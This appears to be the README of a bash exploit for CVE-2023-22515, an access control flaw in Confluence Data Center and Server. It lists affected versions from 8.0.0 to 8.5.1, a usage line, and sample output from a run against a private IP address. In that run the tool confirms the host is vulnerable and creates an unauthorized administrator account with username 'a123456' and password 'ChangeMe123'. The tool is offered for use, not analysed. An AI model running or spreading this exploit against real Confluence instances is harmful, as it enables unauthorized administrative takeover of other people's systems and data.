A simple basch script exploit for CVE-2023-22515.
Confluence Data Center and Server instances have a Broken Access Control Vulnerability (CVE-2023-22515), allowing attackers to create unauthorized Confluence administrator accounts and access Confluence instances.
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] Checking if host is vulnerable...
Vulnerable --> Responde Code: 200
[+] Exploiting Target...
[+] Exploit Completed!!!
[INFO] User created: a123456
[INFO] Password created: ChangeMe123